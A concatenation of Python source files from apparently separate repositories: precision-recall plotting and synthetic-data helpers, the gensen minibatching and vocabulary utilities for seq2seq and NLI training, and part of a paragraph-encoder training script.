scores : list
Consisting of floats.
kwargs : optional
See plot_axes.
"""
p, r, thresholds = precision_recall_curve(true, scores)
plot_recall_precision(p, r, **kwargs)
def plot_recall_precision(p, r, **kwargs):
"""
Plots a precision-recall graph from a series of operating points.
Parameters
----------
p : list
Precision.
r : recall
Recall.
kwargs : optional
See plot_axes.
Returns
-------
"""
fig, ax = plt.subplots(1, 1, figsize=(7, 4))
plot_axes(ax, p, r, legend_text='IAP', **kwargs)
plt.show()
def plot_axes(
ax, y, x,
interpolation=None,
marker_size=30,
title=None,
legend_text='Area'):
"""
Plots a graph on axes provided.
Parameters
----------
ax : matplotlib axes
y : list
x : list
interpolation : None (default) or string ['linear', 'step']
marker_size : float (default: 30)
title : None or string
legend_text : string (default: 'Area')
Text to include on the legend before showing the area. Only used
if interpolation is not None.
"""
ax.scatter(x, y, marker='o', linewidths=0, s=marker_size, clip_on=False)
# Show first and last points more visably
ax.scatter([x[i] for i in [0, -1]], [y[i] for i in [0, -1]],
marker='x', linewidths=2, s=100, clip_on=False)
ax.set_xlim((-0.05, 1.05))
ax.set_ylim((-0.08, 1.08))
ax.set_xlabel('Recall')
ax.set_ylabel('Precision')
if title is not None:
ax.set_title(title, fontsize=20)
if interpolation is not None:
if interpolation == 'linear':
ax.plot(x, y)
area = auc(x, y)
ax.fill_between(x, 0, y, alpha=0.2,
label='{} = {:5.4f}'.format(legend_text, area))
leg = ax.legend()
leg.get_frame().set_linewidth(0.0)
elif interpolation == 'step':
p_long = [v for v in y for _ in (0, 1)][:-1]
r_long = [v for v in x for _ in (0, 1)][1:]
ax.plot(r_long, p_long)
area = auc_using_step(x, y)
ax.fill_between(r_long, 0, p_long, alpha=0.2,
label='{} = {:5.4f}'.format(legend_text, area))
leg = ax.legend()
leg.get_frame().set_linewidth(0.0)
else:
print("Interpolation value of '{}' not recognised. "
"Choose from 'linear', 'quadrature'.".format(interpolation))
def compare_recall_precisions_from_predictions(true, score_dict, **kwargs):
"""
Show two graphs side-by-side for two different sets of scores, against the
same true observations.
Parameters
----------
true : list
score_dict : dict
Consisting of `{name: scores}` where `name` is a string and
`scores` is a list of floats.
kwargs : optional
See plot_axes.
"""
pr = OrderedDict()
for name, score in score_dict.items():
p, r, threshold = precision_recall_curve(true, score)
pr[name] = [p, r]
compare_recall_precision_graph(pr, **kwargs)
def compare_recall_precision_graph(pr_dict, title=None, **kwargs):
"""
Parameters
----------
pr_dict : dict
Consisting of `{name: pr}` where `name` is a string and
`pr` is a tuple of precision and recall values.
title : string
kwargs : optional
See plot_axes.
"""
fig, ax = plt.subplots(1, 2, figsize=(15, 4))
for side, (name, [p, r]) in enumerate(pr_dict.items()):
plot_axes(ax[side], p, r, title=name, legend_text='IAP', **kwargs)
if title is not None:
fig.suptitle(title, fontsize=20, y=1.05)
plt.show()
def operating_points(ranking):
"""
Computes lists of precision and recall from an ordered list of observations.
Parameters
----------
ranking : list
Entries should be binary (0 or 1) and in descending order
(i.e. top-ranked is first).
Returns
-------
precision : list
recall : list
"""
precision, recall = list(), list()
for pos in range(len(ranking)):
p, r = precision_recall_from_ranking(ranking, pos)
precision.append(p)
recall.append(r)
return precision, recall
def precision_recall_from_ranking(ranking, position):
"""
Computes the precision and recall of a particular assignment of labelled
observations to a positive and negative class, where the positive class
comes first in the list, and the negative class comes second, and the
split point is specified.
Parameters
----------
ranking : list
Ordered list of binary observations.
position : int
Position to split the list into positive and negative.
Returns
-------
precision : float
recall : float
"""
if position == 0:
precision = 1.0
recall = 0.0
else:
ranking = np.array(ranking)
precision = (ranking[:position] == 1).sum() / position
recall = (ranking[:position] == 1).sum() / (ranking == 1).sum()
return precision, recall
def auc_using_step(recall, precision):
return sum([(recall[i] - recall[i+1]) * precision[i]
for i in range(len(recall) - 1)])
def roam_average_precision(y_true, y_score, sample_weight=None):
precision, recall, thresholds = precision_recall_curve(
y_true, y_score, sample_weight=sample_weight)
return auc_using_step(recall, precision)
def generate_positive_semi_definite_matrix(n_dim):
"""
Creates a positive semi-definite matrix.
Parameters
----------
n_dim : int
Returns
-------
np.array : (n_dim, n_dim)
"""
cov = np.random.randn(n_dim, n_dim)
return np.dot(cov, cov.T)
def subsample(X, y, frac_positive):
"""
Subsamples a feature matrix and target vector to ensure that a specified
fraction of the target values are positive.
Parameters
----------
X : np.array (n, m)
y : np.array (n, )
frac_positive : float
Returns
-------
X : np.array (n', m)
Some subset of the rows of the input X (i.e. n' <= n)
y : np.array (n', )
Some subset of the rows of the input y (i.e. n' <= n)
"""
positive_idx = np.arange(len(y))[y == 1]
negative_idx = np.arange(len(y))[y == 0]
num_positive = int(frac_positive * len(negative_idx))
positive_idx = np.random.choice(positive_idx, size=num_positive, replace=False)
indices_to_use = np.concatenate([positive_idx, negative_idx])
np.random.shuffle(indices_to_use)
return X[indices_to_use], y[indices_to_use]
def generate_continuous_data_and_targets(
n_dim,
n_samples,
mixing_factor=0.025,
frac_positive=0.1):
"""
Generates a multivariate Gaussian-distributed dataset and a response
variable that is conditioned on a weighted sum of the data.
Parameters
----------
n_dim : int
n_samples : int
mixing_factor : float
'Squashes' the weighted sum into the linear regime of a sigmoid.
Smaller numbers squash closer to 0.5.
Returns
-------
X : np.array
(n_samples, n_dim)
y : np.array
(n_samples, )
"""
cov = generate_positive_semi_definite_matrix(n_dim)
X = np.random.multivariate_normal(
mean=np.zeros(n_dim),
cov=cov,
size=n_samples)
weights = np.random.randn(n_dim)
y_probs = sigmoid(mixing_factor * np.dot(X, weights))
y = np.random.binomial(1, p=y_probs)
X, y = subsample(X, y, frac_positive)
return X, y
def sigmoid(x):
"""
Computes sigmoid(x) for some activation x.
Parameters
----------
x : float
Returns
-------
sigmoid(x) : float
"""
return 1 / (1 + np.exp(-x))
def train_model_and_evaluate(n_dim=50, n_samples=10000, frac_positive=0.05,
mixing_factor=0.025):
"""
Generates some data and trains a logistic regression model.
Parameters
----------
n_dim : int
Number of dimensions for the training data.
n_samples : int
Number of observations.
frac_positive : float
mixing_factor : float
Numbers nearer to 0 make the task more challenging.
Returns
-------
y : np.array (n_test, )
True observed values in the test set.
y_scores : np.array (n_test, )
Model predictions of the test samples.
roc_auc : float
ROC AUC score on the test data
"""
X, y = generate_continuous_data_and_targets(
n_dim=n_dim, n_samples=n_samples, frac_positive=frac_positive,
mixing_factor=mixing_factor)
splits = StratifiedShuffleSplit(y, test_size=0.3, random_state=42)
train_idx, test_idx = list(splits)[0]
lr = LogisticRegressionCV()
lr.fit(X[train_idx], y[train_idx])
y_scores = lr.predict_proba(X[test_idx])[:, 1]
roc_auc = roc_auc_score(y[test_idx], y_scores)
return y[test_idx], y_scores, roc_auc
|
utils_nlp/models/gensen/utils.py | gohanlon/nlp | 4,407 | 12797099 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
"""Minibatching utilities."""
import itertools
import operator
import os
import pickle
import numpy as np
import torch
from sklearn.utils import shuffle
from torch.autograd import Variable
# Change to python3+.
# from itertools import zip
class DataIterator(object):
"""Data Iterator."""
@staticmethod
def _trim_vocab(vocab, vocab_size):
"""Discard start, end, pad and unk tokens if already present.
Args:
vocab(list): Vocabulary.
vocab_size(int): The size of the vocabulary.
Returns:
word2id(list): Word to index list.
id2word(list): Index to word list.
"""
if "<s>" in vocab:
del vocab["<s>"]
if "<pad>" in vocab:
del vocab["<pad>"]
if "</s>" in vocab:
del vocab["</s>"]
if "<unk>" in vocab:
del vocab["<unk>"]
word2id = {"<s>": 0, "<pad>": 1, "</s>": 2, "<unk>": 3}
id2word = {0: "<s>", 1: "<pad>", 2: "</s>", 3: "<unk>"}
sorted_word2id = sorted(
vocab.items(), key=operator.itemgetter(1), reverse=True
)
if vocab_size != -1:
sorted_words = [x[0] for x in sorted_word2id[:vocab_size]]
else:
sorted_words = [x[0] for x in sorted_word2id]
for ind, word in enumerate(sorted_words):
word2id[word] = ind + 4
for ind, word in enumerate(sorted_words):
id2word[ind + 4] = word
return word2id, id2word
def construct_vocab(
self, sentences, vocab_size, lowercase=False, charlevel=False
):
"""Create vocabulary.
Args:
sentences(list): The list of sentences.
vocab_size(int): The size of vocabulary.
lowercase(bool): If lowercase the sentences.
charlevel(bool): If need to split the sentence with space.
Returns:
word2id(list): Word to index list.
id2word(list): Index to word list.
"""
vocab = {}
for sentence in sentences:
if isinstance(sentence, str):
if lowercase:
sentence = sentence.lower()
if not charlevel:
sentence = sentence.split()
for word in sentence:
if word not in vocab:
vocab[word] = 1
else:
vocab[word] += 1
word2id, id2word = self._trim_vocab(vocab, vocab_size)
return word2id, id2word
class BufferedDataIterator(DataIterator):
"""Multi Parallel corpus data iterator."""
def __init__(
self,
src,
trg,
src_vocab_size,
trg_vocab_size,
tasknames,
save_dir,
buffer_size=1e6,
lowercase=False,
seed=0,
):
"""Initialize params.
Args:
src(list): source dataset.
trg(list): target dataset.
src_vocab_size(int): The size of source vocab.
trg_vocab_size(int): The size of target vocab.
tasknames(list): The list of task names.
save_dir(str): The saving dir.
buffer_size(float): Buffer size.
lowercase(bool): if lowercase the data.
"""
self.seed = seed
self.fname_src = src
self.fname_trg = trg
self.src_vocab_size = src_vocab_size
self.trg_vocab_size = trg_vocab_size
self.tasknames = tasknames
self.save_dir = save_dir
self.buffer_size = buffer_size
self.lowercase = lowercase
# Open a list of file pointers to all the files.
self.f_src = [
open(fname, "r", encoding="utf-8") for fname in self.fname_src
]
self.f_trg = [
open(fname, "r", encoding="utf-8") for fname in self.fname_trg
]
# Initialize dictionaries that contain sentences & word mapping dicts
self.src = [
{"data": [], "word2id": None, "id2word": None}
for i in range(len(self.fname_src))
]
self.trg = [
{"data": [], "word2id": None, "id2word": None}
for i in range(len(self.fname_trg))
]
self.build_vocab()
"""Reset file pointers to the start after reading the file to
build vocabularies."""
for idx in range(len(self.src)):
self._reset_filepointer(idx)
for idx in range(len(self.src)):
self.fetch_buffer(idx)
def _reset_filepointer(self, idx):
"""Reset file pointer.
Args:
idx(int): Index used to reset file pointer.
"""
self.f_src[idx] = open(self.fname_src[idx], "r", encoding="utf-8")
self.f_trg[idx] = open(self.fname_trg[idx], "r", encoding="utf-8")
def fetch_buffer(self, idx, reset=True):
"""Fetch sentences from the file into the buffer.
Args:
idx(int): Index used to fetch the sentences.
reset(bool): If need to reset the contents of the current buffer.
"""
# Reset the contents of the current buffer.
if reset:
self.src[idx]["data"] = []
self.trg[idx]["data"] = []
# Populate buffer
for src, trg in zip(self.f_src[idx], self.f_trg[idx]):
if len(self.src[idx]["data"]) == self.buffer_size:
break
if self.lowercase:
self.src[idx]["data"].append(src.lower().split())
self.trg[idx]["data"].append(trg.lower().split())
else:
self.src[idx]["data"].append(src.split())
self.trg[idx]["data"].append(trg.split())
# Sort sentences by decreasing length (hacky bucketing)
self.src[idx]["data"], self.trg[idx]["data"] = zip(
*sorted(
zip(self.src[idx]["data"], self.trg[idx]["data"]),
key=lambda x: len(x[0]),
reverse=True,
)
)
"""If buffer isn't full after reading the contents of the file,
cycle around. """
if len(self.src[idx]["data"]) < self.buffer_size:
assert len(self.src[idx]["data"]) == len(self.trg[idx]["data"])
# Cast things to list to avoid issue with calling .append above
self.src[idx]["data"] = list(self.src[idx]["data"])
self.trg[idx]["data"] = list(self.trg[idx]["data"])
self._reset_filepointer(idx)
self.fetch_buffer(idx, reset=False)
def build_vocab(self):
"""Build a memory efficient vocab."""
# Construct common source vocab.
# Check if save directory exists.
if not os.path.exists(self.save_dir):
raise ValueError("Could not find save dir : %s" % self.save_dir)
# Check if a cached vocab file exists.
if os.path.exists(os.path.join(self.save_dir, "src_vocab.pkl")):
vocab = pickle.load(
open(os.path.join(self.save_dir, "src_vocab.pkl"), "rb")
)
word2id, id2word = vocab["word2id"], vocab["id2word"]
# If not, compute the vocab from scratch and store a cache.
else:
word2id, id2word = self.construct_vocab(
itertools.chain.from_iterable(self.f_src),
self.src_vocab_size,
self.lowercase,
)
pickle.dump(
{"word2id": word2id, "id2word": id2word},
open(os.path.join(self.save_dir, "src_vocab.pkl"), "wb"),
)
for corpus in self.src:
corpus["word2id"], corpus["id2word"] = word2id, id2word
# Do the same for the target vocabulary.
if os.path.exists(os.path.join(self.save_dir, "trg_vocab.pkl")):
vocab = pickle.load(
open(os.path.join(self.save_dir, "trg_vocab.pkl"), "rb")
)
for idx, (corpus, fname) in enumerate(zip(self.trg, self.f_trg)):
word2id, id2word = (
vocab[self.tasknames[idx]]["word2id"],
vocab[self.tasknames[idx]]["id2word"],
)
corpus["word2id"], corpus["id2word"] = word2id, id2word
else:
trg_vocab_dump = {}
for idx, (corpus, fname) in enumerate(zip(self.trg, self.f_trg)):
word2id, id2word = self.construct_vocab(
fname, self.trg_vocab_size, self.lowercase
)
corpus["word2id"], corpus["id2word"] = word2id, id2word
trg_vocab_dump[self.tasknames[idx]] = {}
trg_vocab_dump[self.tasknames[idx]]["word2id"] = word2id
trg_vocab_dump[self.tasknames[idx]]["id2word"] = id2word
pickle.dump(
trg_vocab_dump,
open(os.path.join(self.save_dir, "trg_vocab.pkl"), "wb"),
)
def shuffle_dataset(self, idx):
"""Shuffle current buffer."""
self.src[idx]["data"], self.trg[idx]["data"] = shuffle(
self.src[idx]["data"],
self.trg[idx]["data"],
random_state=self.seed,
)
def get_parallel_minibatch(
self, corpus_idx, index, batch_size, max_len_src, max_len_trg
):
"""Prepare minibatch.
Args:
corpus_idx(int): Corpus Index.
index(int): Index.
batch_size(int): Batch Size.
max_len_src(int): Max length for resource.
max_len_trg(int): Max length ofr target.
Returns: minibatch of src-trg pairs(dict).
"""
src_lines = [
["<s>"] + line[: max_len_src - 2] + ["</s>"]
for line in self.src[corpus_idx]["data"][
index : index + batch_size
]
]
trg_lines = [
["<s>"] + line[: max_len_trg - 2] + ["</s>"]
for line in self.trg[corpus_idx]["data"][
index : index + batch_size
]
]
"""Sort sentences by decreasing length within a minibatch for
`torch.nn.utils.packed_padded_sequence`"""
src_lens = [len(line) for line in src_lines]
sorted_indices = np.argsort(src_lens)[::-1]
sorted_src_lines = [src_lines[idx] for idx in sorted_indices]
sorted_trg_lines = [trg_lines[idx] for idx in sorted_indices]
sorted_src_lens = [len(line) for line in sorted_src_lines]
sorted_trg_lens = [len(line) for line in sorted_trg_lines]
max_src_len = max(sorted_src_lens)
max_trg_len = max(sorted_trg_lens)
# Map words to indices
input_lines_src = [
[
self.src[corpus_idx]["word2id"][w]
if w in self.src[corpus_idx]["word2id"]
else self.src[corpus_idx]["word2id"]["<unk>"]
for w in line
]
+ [self.src[corpus_idx]["word2id"]["<pad>"]]
* (max_src_len - len(line))
for line in sorted_src_lines
]
input_lines_trg = [
[
self.trg[corpus_idx]["word2id"][w]
if w in self.trg[corpus_idx]["word2id"]
else self.trg[corpus_idx]["word2id"]["<unk>"]
for w in line[:-1]
]
+ [self.trg[corpus_idx]["word2id"]["<pad>"]]
* (max_trg_len - len(line))
for line in sorted_trg_lines
]
output_lines_trg = [
[
self.trg[corpus_idx]["word2id"][w]
if w in self.trg[corpus_idx]["word2id"]
else self.trg[corpus_idx]["word2id"]["<unk>"]
for w in line[1:]
]
+ [self.trg[corpus_idx]["word2id"]["<pad>"]]
* (max_trg_len - len(line))
for line in sorted_trg_lines
]
# Cast lists to torch tensors
input_lines_src = Variable(torch.LongTensor(input_lines_src)).cuda()
input_lines_trg = Variable(torch.LongTensor(input_lines_trg)).cuda()
output_lines_trg = Variable(torch.LongTensor(output_lines_trg)).cuda()
sorted_src_lens = (
Variable(torch.LongTensor(sorted_src_lens), volatile=True)
.squeeze()
.cuda()
)
# Return minibatch of src-trg pairs
return {
"input_src": input_lines_src,
"input_trg": input_lines_trg,
"output_trg": output_lines_trg,
"src_lens": sorted_src_lens,
"type": "seq2seq",
}
class NLIIterator(DataIterator):
"""Data iterator for tokenized NLI datasets."""
def __init__(
self, train, dev, test, vocab_size, lowercase=True, vocab=None, seed=0
):
"""Initialize params.
Each of train/dev/test is a tab-separate file of the form
premise \t hypothesis \t label.
Args:
train(torch.Tensor): Training dataset.
dev(torch.Tensor): Validation dataset.
test(torch.Tensor): Testing dataset.
vocab_size(int): The size of the vocabulary.
lowercase(bool): If lowercase the dataset.
vocab(Union[bytes,str): The list of the vocabulary.
"""
self.seed = seed
self.train = train
self.dev = dev
self.test = test
self.vocab_size = vocab_size
self.lowercase = lowercase
self.vocab = vocab
self.train_lines = [
line.strip().lower().split("\t")
for line in open(self.train, encoding="utf-8")
]
self.dev_lines = [
line.strip().lower().split("\t")
for line in open(self.dev, encoding="utf-8")
]
self.test_lines = [
line.strip().lower().split("\t")
for line in open(self.test, encoding="utf-8")
]
if self.vocab is not None:
# binary mode doesn't take an encoding argument
self.vocab = pickle.load(open(self.vocab, "rb"))
self.word2id = self.vocab["word2id"]
self.id2word = self.vocab["id2word"]
self.vocab_size = len(self.word2id)
else:
self.word2id, self.id2word = self.construct_vocab(
[x[0] for x in self.train_lines]
+ [x[1] for x in self.train_lines],
self.vocab_size,
lowercase=self.lowercase,
)
# Label text to class mapping.
self.text2label = {"entailment": 0, "neutral": 1, "contradiction": 2}
self.shuffle_dataset()
def shuffle_dataset(self):
"""Shuffle training data."""
self.train_lines = shuffle(self.train_lines, random_state=self.seed)
def get_parallel_minibatch(self, index, batch_size, sent_type="train"):
"""Prepare minibatch.
Args:
index(int): The index for line.
batch_size(int): Batch size.
sent_type(str): Type of dataset.
Returns:
dict for batch training.
"""
if sent_type == "train":
lines = self.train_lines
elif sent_type == "dev":
lines = self.dev_lines
else:
lines = self.test_lines
sent1 = [
["<s>"] + line[0].split() + ["</s>"]
for line in lines[index : index + batch_size]
]
sent2 = [
["<s>"] + line[1].split() + ["</s>"]
for line in lines[index : index + batch_size]
]
labels = [
self.text2label[line[2]]
for line in lines[index : index + batch_size]
]
sent1_lens = [len(line) for line in sent1]
sorted_sent1_indices = np.argsort(sent1_lens)[::-1]
sorted_sent1_lines = [sent1[idx] for idx in sorted_sent1_indices]
rev_sent1 = np.argsort(sorted_sent1_indices)
sent2_lens = [len(line) for line in sent2]
sorted_sent2_indices = np.argsort(sent2_lens)[::-1]
sorted_sent2_lines = [sent2[idx] for idx in sorted_sent2_indices]
rev_sent2 = np.argsort(sorted_sent2_indices)
sorted_sent1_lens = [len(line) for line in sorted_sent1_lines]
sorted_sent2_lens = [len(line) for line in sorted_sent2_lines]
max_sent1_len = max(sorted_sent1_lens)
max_sent2_len = max(sorted_sent2_lens)
sent1 = [
[
self.word2id[w] if w in self.word2id else self.word2id["<unk>"]
for w in line
]
+ [self.word2id["<pad>"]] * (max_sent1_len - len(line))
for line in sorted_sent1_lines
]
sent2 = [
[
self.word2id[w] if w in self.word2id else self.word2id["<unk>"]
for w in line
]
+ [self.word2id["<pad>"]] * (max_sent2_len - len(line))
for line in sorted_sent2_lines
]
sent1 = Variable(torch.LongTensor(sent1)).cuda()
sent2 = Variable(torch.LongTensor(sent2)).cuda()
labels = Variable(torch.LongTensor(labels)).cuda()
sent1_lens = (
Variable(torch.LongTensor(sorted_sent1_lens), requires_grad=False)
.squeeze()
.cuda()
)
sent2_lens = (
Variable(torch.LongTensor(sorted_sent2_lens), requires_grad=False)
.squeeze()
.cuda()
)
rev_sent1 = (
Variable(torch.LongTensor(rev_sent1), requires_grad=False)
.squeeze()
.cuda()
)
rev_sent2 = (
Variable(torch.LongTensor(rev_sent2), requires_grad=False)
.squeeze()
.cuda()
)
return {
"sent1": sent1,
"sent2": sent2,
"sent1_lens": sent1_lens,
"sent2_lens": sent2_lens,
"rev_sent1": rev_sent1,
"rev_sent2": rev_sent2,
"labels": labels,
"type": "nli",
}
def get_validation_minibatch(
src, trg, index, batch_size, src_word2id, trg_word2id
):
"""Prepare minibatch.
Args:
src(list): source data.
trg(list): target data.
index(int): index for the file.
batch_size(int): batch size.
src_word2id(list): Word to index for source.
trg_word2id(list): Word to index for target.
Returns:
Dict for seq2seq model.
"""
src_lines = [
["<s>"] + line + ["</s>"] for line in src[index : index + batch_size]
]
trg_lines = [
["<s>"] + line + ["</s>"] for line in trg[index : index + batch_size]
]
src_lens = [len(line) for line in src_lines]
sorted_indices = np.argsort(src_lens)[::-1]
sorted_src_lines = [src_lines[idx] for idx in sorted_indices]
sorted_trg_lines = [trg_lines[idx] for idx in sorted_indices]
sorted_src_lens = [len(line) for line in sorted_src_lines]
sorted_trg_lens = [len(line) for line in sorted_trg_lines]
max_src_len = max(sorted_src_lens)
max_trg_len = max(sorted_trg_lens)
input_lines_src = [
[src_word2id[w] if w in src else src_word2id["<unk>"] for w in line]
+ [src_word2id["<pad>"]] * (max_src_len - len(line))
for line in sorted_src_lines
]
input_lines_trg = [
[
trg_word2id[w] if w in trg_word2id else trg_word2id["<unk>"]
for w in line[:-1]
]
+ [trg_word2id["<pad>"]] * (max_trg_len - len(line))
for line in sorted_trg_lines
]
output_lines_trg = [
[
trg_word2id[w] if w in trg_word2id else trg_word2id["<unk>"]
for w in line[1:]
]
+ [trg_word2id["<pad>"]] * (max_trg_len - len(line))
for line in sorted_trg_lines
]
# For pytroch 0.4
with torch.no_grad():
input_lines_src = Variable(torch.LongTensor(input_lines_src)).cuda()
input_lines_trg = Variable(torch.LongTensor(input_lines_trg)).cuda()
output_lines_trg = Variable(torch.LongTensor(output_lines_trg)).cuda()
# sorted_src_lens = Variable(
# torch.LongTensor(sorted_src_lens)
# ).squeeze().cuda()
sorted_src_lens = (
Variable(torch.LongTensor(sorted_src_lens))
.view(len(sorted_src_lens))
.cuda()
)
return {
"input_src": input_lines_src,
"input_trg": input_lines_trg,
"output_trg": output_lines_trg,
"src_lens": sorted_src_lens,
"type": "seq2seq",
}
def compute_validation_loss(
config, model, train_iterator, criterion, task_idx, lowercase=False
):
"""Compute validation loss for a task.
Args:
config(dict): configuration list.
model(MultitaskModel): model.
train_iterator(BufferedDataIterator): Multi Parallel corpus data iterator.
criterion(nn.CrossEntropyLoss): criterion function for loss.
task_idx(int): Task index.
lowercase(bool): If lowercase the data.
Returns: float as the mean of the loss.
"""
val_src = config["data"]["paths"][task_idx]["val_src"]
val_trg = config["data"]["paths"][task_idx]["val_trg"]
if lowercase:
val_src = [
line.strip().lower().split()
for line in open(val_src, "r", encoding="utf-8")
]
val_trg = [
line.strip().lower().split()
for line in open(val_trg, "r", encoding="utf-8")
]
else:
val_src = [
line.strip().split()
for line in open(val_src, "r", encoding="utf-8")
]
val_trg = [
line.strip().split()
for line in open(val_trg, "r", encoding="utf-8")
]
batch_size = config["training"]["batch_size"]
losses = []
for j in range(0, len(val_src), batch_size):
minibatch = get_validation_minibatch(
val_src,
val_trg,
j,
batch_size,
train_iterator.src[task_idx]["word2id"],
train_iterator.trg[task_idx]["word2id"],
)
decoder_logit = model(minibatch, task_idx)
loss = criterion(
decoder_logit.contiguous().view(-1, decoder_logit.size(2)),
minibatch["output_trg"].contiguous().view(-1),
)
# losses.append(loss.data[0])
losses.append(loss.item())
return np.mean(losses)
# Original source: https://github.com/Maluuba/gensen
|
paragraph_encoder/train_para_encoder.py | rajarshd/Multi-Step-Reasoning | 122 | 12797166 | <filename>paragraph_encoder/train_para_encoder.py
import torch
import numpy as np
import json
import os
import pickle
import sys
import logging
import shutil
from tqdm import tqdm
from torch.autograd import Variable
import torch.optim as optim
import torch.nn.functional as F
from torch.utils.data.sampler import RandomSampler
import config
from model import utils, data, vector
from model.retriever import LSTMRetriever
from multi_corpus import MultiCorpus
from torch.utils.data.sampler import SequentialSampler, RandomSampler
import math
logger = logging.getLogger()
global_timer = utils.Timer()
stats = {'timer': global_timer, 'epoch': 0, 'best_valid': 0, 'best_verified_valid': 0, 'best_acc': 0, 'best_verified_acc': 0}
def make_data_loader(args, corpus, train_time=False):
dataset = data.MultiCorpusDataset(
args,
corpus,
args.word_dict,
args.feature_dict,
single_answer=False,
para_mode=args.para_mode,
train_time=train_time
)
sampler = SequentialSampler(dataset) if not train_time else RandomSampler(dataset)
loader = torch.utils.data.DataLoader(
dataset,
batch_size=args.batch_size,
sampler=sampler,
num_workers=args.data_workers,
collate_fn=vector.batchify(args, args.para_mode, train_time=train_time),
pin_memory=True
)
return loader
def init_from_checkpoint(args):
logger.info('Loading model from saved checkpoint {}'.format(args.pretrained))
model = torch.load(args.pretrained)
word_dict = model['word_dict']
feature_dict = model['feature_dict']
args.vocab_size = len(word_dict)
args.embedding_dim_orig = args.embedding_dim
args.word_dict = word_dict
args.feature_dict = feature_dict
ret = LSTMRetriever(args, word_dict, feature_dict)
# load saved param values
ret.model.load_state_dict(model['state_dict']['para_clf'])
optimizer = None
parameters = ret.get_trainable_params()
if args.optimizer == 'sgd':
optimizer = optim.SGD(parameters, args.learning_rate,
momentum=args.momentum,
weight_decay=args.weight_decay)
elif args.optimizer == 'adamax':
optimizer = optim.Adamax(parameters,
weight_decay=args.weight_decay)
elif args.optimizer == 'nag':
optimizer = NAG(parameters, args.learning_rate, momentum=args.momentum,
weight_decay=args.weight_decay)
else:
raise RuntimeError('Unsupported optimizer: %s' % args.optimizer)
optimizer.load_state_dict(model['state_dict']['optimizer'])
logger.info('Model loaded...')
return ret, optimizer, word_dict, feature_dict
def init_from_scratch(args, train_exs):
logger.info('Initializing model from scratch')
word_dict = feature_dict = None
# create or get vocab
word_dict = utils.build_word_dict(args, train_exs)
if word_dict is not None:
args.vocab_size = len(word_dict)
args.embedding_dim_orig = args.embedding_dim
args.word_dict = word_dict
args.feature_dict = feature_dict
ret = LSTMRetriever(args, word_dict, feature_dict)
# --------------------------------------------------------------------------
# TRAIN/VALID LOOP
# --------------------------------------------------------------------------
# train
parameters = ret.get_trainable_params()
optimizer = None
if parameters is not None and len(parameters) > 0:
if args.optimizer == 'sgd':
optimizer = optim.SGD(parameters, args.learning_rate,
momentum=args.momentum,
weight_decay=args.weight_decay)
elif args.optimizer == 'adamax':
optimizer = optim.Adamax(parameters,
weight_decay=args.weight_decay)
elif args.optimizer == 'nag':
optimizer = NAG(parameters, args.learning_rate, momentum=args.momentum,
weight_decay=args.weight_decay)
else:
raise RuntimeError('Unsupported optimizer: %s' % args.optimizer)
else:
pass
return ret, optimizer, word_dict, feature_dict
def train_binary_classification(args, ret_model, optimizer, train_loader, verified_dev_loader=None):
args.train_time = True
para_loss = utils.AverageMeter()
ret_model.model.train()
for idx, ex in enumerate(train_loader):
if ex is None:
continue
inputs = [e if e is None or type(e) != type(ex[0]) else Variable(e.cuda(async=True))
for e in ex[:]]
ret_input = [*inputs[:4]]
scores, _, _ = ret_model.score_paras(*ret_input)
y_num_occurrences = Variable(ex[-2])
labels = (y_num_occurrences > 0).float()
labels = labels.cuda()
# BCE logits loss
batch_para_loss = F.binary_cross_entropy_with_logits(scores.squeeze(1), labels)
optimizer.zero_grad()
batch_para_loss.backward()
torch.nn.utils.clip_grad_norm(ret_model.get_trainable_params(),
2.0)
optimizer.step()
para_loss.update(batch_para_loss.data.item())
if math.isnan(para_loss.avg):
import pdb
pdb.set_trace()
if idx % 25 == 0 and idx > 0:
logger.info('Epoch = {} | iter={}/{} | para loss = {:2.4f}'.format(
stats['epoch'],
idx, len(train_loader),
para_loss.avg))
para_loss.reset()
def eval_binary_classification(args, ret_model, corpus, dev_loader, verified_dev_loader=None, save_scores = True):
total_exs = 0
args.train_time = False
ret_model.model.eval()
accuracy = 0.0
for idx, ex in enumerate(tqdm(dev_loader)):
if ex is None:
raise BrokenPipeError
inputs = [e if e is None or type(e) != type(ex[0]) else Variable(e.cuda(async=True))
for e in ex[:]]
ret_input = [*inputs[:4]]
total_exs += ex[0].size(0)
scores, _, _ = ret_model.score_paras(*ret_input)
scores = F.sigmoid(scores)
y_num_occurrences = Variable(ex[-2])
labels = (y_num_occurrences > 0).float()
labels = labels.data.numpy()
scores = scores.cpu().data.numpy()
scores = scores.reshape((-1))
if save_scores:
for i, pid in enumerate(ex[-1]):
corpus.paragraphs[pid].model_score = scores[i]
scores = scores > 0.5
a = scores == labels
accuracy += a.sum()
logger.info('Eval accuracy = {} '.format(accuracy/total_exs))
top1 = get_topk(corpus)
return top1
def print_vectors(args, para_vectors, question_vectors, corpus, train=False, test=False):
all_question_vectors = []
all_para_vectors = []
qid2idx = {}
cum_num_lens = []
all_correct_ans = {}
cum_num_len = 0
for question_i, qid in enumerate(corpus.questions):
labels = []
all_question_vectors.append(question_vectors[qid])
qid2idx[qid] = question_i
cum_num_len += len(corpus.questions[qid].pids)
cum_num_lens.append(cum_num_len)
for para_i, pid in enumerate(corpus.questions[qid].pids):
if corpus.paragraphs[pid].ans_occurance > 0:
labels.append(para_i)
all_para_vectors.append(para_vectors[pid])
all_correct_ans[qid] = labels
all_para_vectors = np.stack(all_para_vectors)
all_question_vectors = np.stack(all_question_vectors)
assert all_para_vectors.shape[0] == cum_num_lens[-1]
assert all_question_vectors.shape[0] == len(cum_num_lens)
assert all_question_vectors.shape[0] == len(qid2idx)
assert all_question_vectors.shape[0] == len(all_correct_ans)
## saving code
if train:
OUT_DIR = os.path.join(args.save_dir, args.src, args.domain, "train/")
else:
if args.is_test == 0:
OUT_DIR = os.path.join(args.save_dir, args.src, args.domain, "dev/")
else:
OUT_DIR = os.path.join(args.save_dir, args.src, args.domain, "test/")
logger.info("Printing vectors at {}".format(OUT_DIR))
if not os.path.exists(OUT_DIR):
os.makedirs(OUT_DIR)
else:
shutil.rmtree(OUT_DIR, ignore_errors=True)
os.makedirs(OUT_DIR)
json.dump(qid2idx, open(OUT_DIR + 'map.json', 'w'))
json.dump(all_correct_ans, open(OUT_DIR + 'correct_paras.json', 'w'))
all_cumlen = np.array(cum_num_lens)
np.save(OUT_DIR + "document", all_para_vectors)
np.save(OUT_DIR + "question", all_question_vectors)
np.save(OUT_DIR + "all_cumlen", cum_num_lens)
